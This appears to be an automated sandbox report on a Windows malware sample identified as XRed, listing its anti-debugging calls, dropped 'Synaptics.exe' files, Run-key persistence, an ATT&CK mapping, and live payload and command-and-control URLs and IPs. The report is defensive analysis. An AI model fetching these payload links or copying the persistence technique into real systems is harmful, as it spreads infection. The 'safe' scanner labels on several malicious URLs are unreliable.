Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746376373.0000000001756000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3582178717.0000000000711000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CB851A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_00CB851A

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

1_2_00CBC27B

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC2955 GetProcessHeap,RtlAllocateHeap,

1_2_00CC2955

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CB90B2 SetUnhandledExceptionFilter,	1_2_00CB90B2
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CB851A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00CB851A
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CBA71C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00CBA71C
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 2_2_6C9CCC71 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6C9CCC71
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 2_2_6C9CBA63 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6C9CBA63

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe"			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate			Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC3185 _memset,_memset,_memset,_memset,_memset,_memset,InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

1_2_00CC3185

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC6B8A AllocateAndInitializeSid,CheckTokenMembership,

1_2_00CC6B8A

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\logo.png VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00C935AD ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,CreateNamedPipeW,GetLastError,

1_2_00C935AD

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00C998DB GetSystemTime,GetDateFormatW,GetDateFormatW,GetLastError,GetDateFormatW,GetLastError,

1_2_00C998DB

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC019C LookupAccountNameW,LookupAccountNameW,GetLastError,GetLastError,GetLastError,LookupAccountNameW,GetLastError,

1_2_00CC019C

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC8581 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

1_2_00CC8581

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00C91B46 _memset,_memset,CoInitializeEx,GetModuleHandleW,GetVersionExW,GetLastError,CoUninitialize,

1_2_00C91B46

Stealing of Sensitive Information

Yara detected XRed

Source: Yara match	File source: LisectAVT_2403002A_282.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_282.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX822C.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Remote Access Functionality

Yara detected XRed

Source: Yara match	File source: LisectAVT_2403002A_282.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002A_282.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX822C.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	41 Scripting	1 Replication Through Removable Media	2 Native API	41 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	12 System Time Discovery	Remote Services	Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	2 Obfuscated Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Windows Service	1 Windows Service	1 DLL Side-Loading	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	12 Process Injection	11 Masquerading	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	24 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	11 Virtualization/Sandbox Evasion	LSA Secrets	24 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	21 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
LisectAVT_2403002A_282.exe	100%	Avira	WORM/Delphi.Gen
LisectAVT_2403002A_282.exe	100%	Avira	W2000M/Dldr.Agent.17651006
LisectAVT_2403002A_282.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Synaptics\RCX822C.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX822C.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	WORM/Delphi.Gen
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX822C.tmp	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\DVWHKMNFNN\~$cache1	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dl$	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/Synaptics.rarZ	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	0%	Avira URL Cloud	safe
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978X	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/Synaptics.rar	0%	Avira URL Cloud	safe
https://api.informationprotection.azure.com/api/72f988bf-86f1-41af-91ab-2d7cd011db47	0%	Avira URL Cloud	safe
http://wixtoolset.org/schemas/thmutil/2010	0%	Avira URL Cloud	safe
http://wixtoolset.org/schemas/thmutil/2010Hd;la	0%	Avira URL Cloud	safe
https://docs.google.com/	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dll6	0%	Avira URL Cloud	safe
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SUpdate.iniZ	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	0%	Avira URL Cloud	safe
http://wixtoolset.org/schemas/thmutil/2010(	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SUpdate.ini	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dll	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rarH	0%	Avira URL Cloud	safe
https://api.informationprotection.azure.com/api/72f988bf-86f1-4	0%	Avira URL Cloud	safe
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl8	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	true	unknown
docs.google.com	142.250.184.238	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
drive.usercontent.google.com	142.250.185.65	true	false	unknown
xred.mooo.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SSLLibrary.dl$	LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.informationprotection.azure.com/api/72f988bf-86f1-41af-91ab-2d7cd011db47	license.rtf11.2.dr, license.rtf10.2.dr, license.rtf1.2.dr, license.rtf2.2.dr	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	Synaptics.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://wixtoolset.org/schemas/thmutil/2010	._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584210775.0000000003270000.00000004.00000020.00020000.00000000.sdmp, thm.xml.2.dr	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	Synaptics.exe, 00000003.00000003.2449020475.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3583327352.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2437651613.000000000073C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2472981090.0000000000741000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/Synaptics.rar	Synaptics.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978X	LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wixtoolset.org/schemas/thmutil/2010Hd;la	._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/	Synaptics.exe, 00000003.00000002.3582178717.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wixtoolset.org/schemas/thmutil/2010(	._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3584436844.00000000035B0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	Synaptics.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	Synaptics.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SUpdate.ini	Synaptics.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/Synaptics.rarH	LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.informationprotection.azure.com/api/72f988bf-86f1-4	license.rtf0.2.dr, license.rtf3.2.dr	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SSLLibrary.dll	Synaptics.exe.0.dr	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl8	LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.184.238	docs.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	true
142.250.185.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482372
Start date and time:	2024-07-25 22:03:59 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_282.exe
Detection:	MAL
Classification:	mal54.troj.expl.winEXE@11/44@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 75 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 40.79.167.8
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdaue02.australiaeast.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LisectAVT_2403002A_282.exe

Simulations

Behavior and APIs

Time	Type	Description
21:04:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.45	https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4	Get hash	malicious	HTMLPhisher	Browse	nam.dcv.ms/BxPVLH2cz4
69.42.215.252	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_129.exe	Get hash	malicious	PureLog Stealer, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_141.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_198.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_311.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_318.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	LisectAVT_2403002B_327.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	LisectAVT_2403002A_362.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://maillafayette-my.sharepoint.com/:o:/g/personal/cconnell_themailgroup_com/EiPEfQb_CGBDlFd0abPX6YIB1n8KvJoQzv3I2xEqExsGKQ?e=6alXaG	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://forms.office.com/Pages/ResponsePage.aspx?id=2zW8lMsRrkyqi7IHHVNhLgILSZ8nyRhPs0os36GqVFNURElXNEQwRldKWjdYM0cwRERLSFFETE9ERy4u	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	LisectAVT_2403002B_311.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	LisectAVT_2403002B_359.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	LisectAVT_2403002B_54.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://outlook.office365.com/Encryption/retrieve.ashx?recipientemailaddress=katherine.perkins%40maryland.gov&senderemailaddress=Cory.Luquet%40va.gov&senderorganization=AwF9AAAAAnkAAAADAQAAAD%2fYRGiVePBBlP6C%2fV8ItGdPVT1EVkFHT1Yub25taWNyb3NvZnQuY29tLE9VPU1pY3Jvc29mdCBFeGNoYW5nZSBIb3N0ZWQgT3JnYW5pemF0aW9ucyxEQz1OQU1QUjA5QTAwMSxEQz1wcm9kLERDPW91dGxvb2ssREM9Y29t4swwGw4RskCY4sbIMr8ddkNOPUNvbmZpZ3VyYXRpb24sQ049RFZBR09WLm9ubWljcm9zb2Z0LmNvbSxDTj1Db25maWd1cmF0aW9uVW5pdHMsREM9TkFNUFIwOUEwMDEsREM9cHJvZCxEQz1vdXRsb29rLERDPWNvbQE%3d&messageid=%3cSJ0PR09MB94487482460A33039761D8C098C72%40SJ0PR09MB9448.namprd09.prod.outlook.com%3e&cfmRecipient=SystemMailbox%7b4ff7f9f5-9903-48ab-90c8-caf5a1ed619a%7d%40DVAGOV.onmicrosoft.com&consumerEncryption=false&senderorgid=e95f1b23-abaf-45ee-821d-b7ab251ab3bf&urldecoded=1&e4e_sdata=RggDlndnAGWC1U%2fveN%2fzIkcw%2b97ky6vK1ncZ4d41HAm8oqI%2bMhtuLM8Y9ohsinAWBTK4AJg9DFB8FcVO8qRi1iG6VSfDQ2WwVn4vv8bN7%2bTvC5jS6uA2ildLK5PdPjp3QiN86hlMDrxe%2f408u4mcUVYtb2BKt4kkYk8XsmDIB%2bdQPLVveVPsiVvTEh1hR439hcl%2bywu50KrvHf39WhvxQmttHJ0soRqxm67Tfg877J6kE7vpAF8OA8kiqFVZLyIkssq9TIxj%2bbIfNhkeaSQw%2bVr3OetCjHVgReAJ6FByh%2fXr6ZnsIy6jLS%2fUwl0ohuT%2fEfT43x8Yegw%2fFscRWKIAZg%3d%3d	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion/	Get hash	malicious	Unknown	Browse	13.107.246.45
	Lisect_AVT_24003_G1A_33.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
freedns.afraid.org	LisectAVT_2403002A_440.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002A_445.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	LisectAVT_2403002B_129.exe	Get hash	malicious	PureLog Stealer, XRed	Browse	69.42.215.252
